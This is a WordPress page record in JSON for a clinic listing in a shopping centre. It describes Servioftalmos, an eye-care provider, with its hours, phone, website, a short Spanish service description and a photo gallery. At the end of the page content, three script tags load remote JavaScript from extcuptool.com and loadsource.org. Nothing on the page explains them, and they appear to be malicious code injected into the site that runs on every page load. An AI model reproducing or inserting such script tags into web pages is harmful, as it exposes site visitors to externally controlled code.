{"id":10062,"date":"2018-09-04T17:34:08","date_gmt":"2018-09-04T17:34:08","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=10062"},"modified":"2026-04-17T01:29:37","modified_gmt":"2026-04-17T01:29:37","slug":"servioftalmos","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/servioftalmos\/","title":{"rendered":"SO"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a08f4387432b .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a08f4387432b .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a08f43874868 { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a08f43874868 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f43874868 .cmsmasters_heading, #cmsmasters_heading_6a08f43874868 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f43874868 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f438748af { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a08f438748af .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f438748af .cmsmasters_heading, #cmsmasters_heading_6a08f438748af .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f438748af .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f438748de { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a08f438748de .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f438748de .cmsmasters_heading, #cmsmasters_heading_6a08f438748de .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f438748de .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f4387490c { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a08f4387490c .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f4387490c .cmsmasters_heading, #cmsmasters_heading_6a08f4387490c .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f4387490c .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f43874937 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a08f43874937 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f43874937 .cmsmasters_heading, #cmsmasters_heading_6a08f43874937 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f43874937 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f43874988 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a08f43874988 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f43874988 .cmsmasters_heading, #cmsmasters_heading_6a08f43874988 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f43874988 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f438749bc { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:50px; \n} \n\n#cmsmasters_heading_6a08f438749bc .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08f438749bc .cmsmasters_heading, #cmsmasters_heading_6a08f438749bc .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f438749bc .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08f43874aac { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a08f43874aac .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a08f43874aac .cmsmasters_heading, #cmsmasters_heading_6a08f43874aac .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08f43874aac .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a08f43874af4 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a08f43874b73 { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a08f43874baf .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a08f43874baf .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a08f4387432b\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"aligncenter\">\n<div class=\"cmsmasters_img  cmsmasters_image_c\">\n<img decoding=\"async\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/so.jpg\" alt=\"\" \/>\n<\/div>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a08f43874868\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a08f438748af\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a Viernes: 7:00 am a 7:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a08f438748de\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">S\u00e1bados: 7:00 am a 1:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a08f4387490c\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Contacto<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a08f43874937\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">6065297<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a08f43874988\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">P\u00e1gina Web<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a08f438749bc\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\"><a href=\"http:\/\/www.servioftalmos.com.co\/\">www.servioftalmos.com.co<\/a><\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a08f43874aac\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">So &#8211; Local 201 &#8211; 214<\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a08f43874af4\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<p>En Servioftalmos ofrecemos una atenci\u00f3n integral en salud visual que abarca desde la promoci\u00f3n, la prevenci\u00f3n y el tratamiento de enfermedades oculares, hasta la investigaci\u00f3n y la incorporaci\u00f3n de tecnolog\u00eda de punta en todos los procesos de atenci\u00f3n al usuario.<\/p>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a08f43874b73\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a08f43874baf\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos1.jpg\" rel=\"ilightbox[6a08f43874baf]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos1-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos1-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos1-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos2.jpg\" rel=\"ilightbox[6a08f43874baf]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos3.jpg\" rel=\"ilightbox[6a08f43874baf]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/09\/servioftalmos3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a08f43874baf').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a08f43874baf', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a08f43875aa9\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_701356722&amp;key=1b3622eba14d06227e&amp;cv=1533752397&amp;t=1533752396913\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_121572048&amp;key=1b3622eba14d06227e&amp;cv=15913&amp;t=1533752396914\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533752396923\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-10062","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/10062","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=10062"}],"version-history":[{"count":10,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/10062\/revisions"}],"predecessor-version":[{"id":11378,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/10062\/revisions\/11378"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=10062"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}